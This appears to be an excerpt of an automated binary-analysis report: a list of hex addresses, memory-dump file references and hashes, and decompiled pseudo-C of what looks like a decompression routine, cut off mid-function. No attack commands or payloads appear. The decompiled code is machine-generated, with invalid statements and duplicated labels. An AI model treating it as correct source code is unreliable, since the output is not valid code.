                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x0040681f
                                                                                                        0x00406819
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00406819
                                                                                                        0x004067a0
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x004063d4

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                        • Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
                                                                                                        • Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                        • Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
